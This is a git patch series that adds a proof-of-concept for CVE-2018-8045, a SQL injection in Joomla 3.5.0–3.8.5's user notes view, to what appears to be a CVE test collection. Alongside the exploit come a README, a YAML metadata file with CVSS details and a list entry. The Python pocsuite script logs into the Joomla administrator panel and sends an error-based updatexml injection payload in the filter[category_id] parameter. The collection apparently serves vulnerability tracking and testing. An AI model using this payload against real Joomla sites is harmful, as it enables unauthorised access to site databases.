From 693a893fd39087ddb095be70eca44057f00ecd2e Mon Sep 17 00:00:00 2001 From: strawball Date: Thu, 27 Apr 2023 13:13:48 +0000 Subject: [PATCH 1/3] CWE-2018-8045 Signed-off-by: strawball --- cve/joomla/2018/CVE-2018-8045/README.md | 2 + .../CVE-2018-8045/joomla_user_notes_sqli.py | 70 +++++++++++++++++++ cve/joomla/2018/yaml/CVE-2018-8045.yaml | 22 ++++++ 3 files changed, 94 insertions(+) create mode 100644 cve/joomla/2018/CVE-2018-8045/README.md create mode 100644 cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py create mode 100644 cve/joomla/2018/yaml/CVE-2018-8045.yaml diff --git a/cve/joomla/2018/CVE-2018-8045/README.md b/cve/joomla/2018/CVE-2018-8045/README.md new file mode 100644 index 00000000..25e3cf94 --- /dev/null +++ b/cve/joomla/2018/CVE-2018-8045/README.md @@ -0,0 +1,2 @@ +# CVE-2018-8045 +Joomla内核SQL注入漏洞原理及poc \ No newline at end of file diff --git a/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py new file mode 100644 index 00000000..e7ae600d --- /dev/null +++ b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py @@ -0,0 +1,70 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- +import re +import hashlib +from pocsuite.api.request import req +from pocsuite.api.poc import register +from pocsuite.lib.core.data import logger +from pocsuite.api.poc import Output, POCBase +from pocsuite.api.utils import randomStr +from pocsuite.lib.core.enums import CUSTOM_LOGGING +from urlparse import urljoin + + +class TestPOC(POCBase): + vulID = '' + version = '' + author = 'luckybool1020' + + def get_pass(self, joomla_session): + if any(para not in self.params for para in ['user', 'passwd']): + logger.log( + CUSTOM_LOGGING.SYSINFO, + "You can use --extra-params=\"{'user': 'xxx','passwd': 'xxx'}\" to exec command") + return self.parse_output(None) + else: + user, passwd = self.params['user'], self.params['passwd'] + url = urljoin(self.url, '/administrator/index.php') + content = joomla_session.get(url).content + re_para = '.*' + match = re.findall(re_para, content, re.S) + if match: + value, token = match[0][0], match[0][1] + else: + return self.parse_output(None) + self.headers = { + "Content-Type": "application/x-www-form-urlencoded" + } + pass_payload = 'username={user}&passwd={passwd}&option=com_login&task=login&return={value}&{token}=1'.format( + user=user, passwd=passwd, value=value, token=token) + joomla_session.post( + url=url, params=None, headers=self.headers, data=pass_payload) + + def _verify(self): + '''verify mode''' + result = {} + joomla_session = req.session() + self.get_pass(joomla_session) + rand_str = randomStr(10, "0123456789") + url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes') + sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format( + randstr=rand_str) + r = joomla_session.post(url=url, headers=self.headers, data=sqli_payload) + if r.status_code == 500 and hashlib.md5(rand_str).hexdigest()[ + 0:31] in r.content: + result['VerifyInfo'] = {} + result['VerifyInfo']['URL'] = url + return self.parse_output(result) + + _attack = _verify + + def parse_output(self, result): + output = Output(self) + if result: + output.success(result) + else: + output.fail('Internet nothing returned') + return output + + +register(TestPOC) \ No newline at end of file diff --git a/cve/joomla/2018/yaml/CVE-2018-8045.yaml b/cve/joomla/2018/yaml/CVE-2018-8045.yaml new file mode 100644 index 00000000..8b44cfd0 --- /dev/null +++ b/cve/joomla/2018/yaml/CVE-2018-8045.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-8045 +source: + https://github.com/luckybool1020/CVE-2018-8045 +info: + name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 + severity: high + description: + 在 Joomla!从3.5.0到3.8.5,SQL 语句中缺少变量类型转换导致用户注释列表视图中存在 SQL 注入漏洞。 + scope-of-influence: + Joomla! 3.5.0 through 3.8.5 + reference: + - https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html + - https://nvd.nist.gov/vuln/detail/cve-2018-8045 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2018-8045 + cwe-id: CWE-89 + cnvd-id: None + kve-id: None + tags: + - SQL注入 \ No newline at end of file -- Gitee From 5c495747ee0ff617e5fa49e24872992f1efc1637 Mon Sep 17 00:00:00 2001 From: strawball Date: Thu, 27 Apr 2023 13:14:45 +0000 Subject: [PATCH 2/3] CWE-2018-8045 Signed-off-by: strawball --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 9fdf2623..d6a5609b 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -149,6 +149,7 @@ cve: - CVE-2016-2107 joomla: - CVE-2023-23752 + - CVE-2018-8045 libxml2: - CVE-2020-24977 - CVE-2021-3517 -- Gitee From 5423244fb620568dfab6614939b092831090792c Mon Sep 17 00:00:00 2001 From: strawball Date: Wed, 10 May 2023 03:18:05 +0000 Subject: [PATCH 3/3] =?UTF-8?q?tags=E4=BF=AE=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: strawball --- cve/joomla/2018/yaml/CVE-2018-8045.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/joomla/2018/yaml/CVE-2018-8045.yaml b/cve/joomla/2018/yaml/CVE-2018-8045.yaml index 8b44cfd0..b19e536c 100644 --- a/cve/joomla/2018/yaml/CVE-2018-8045.yaml +++ b/cve/joomla/2018/yaml/CVE-2018-8045.yaml @@ -18,5 +18,4 @@ info: cwe-id: CWE-89 cnvd-id: None kve-id: None - tags: - - SQL注入 \ No newline at end of file + tags: SQL注入 \ No newline at end of file -- Gitee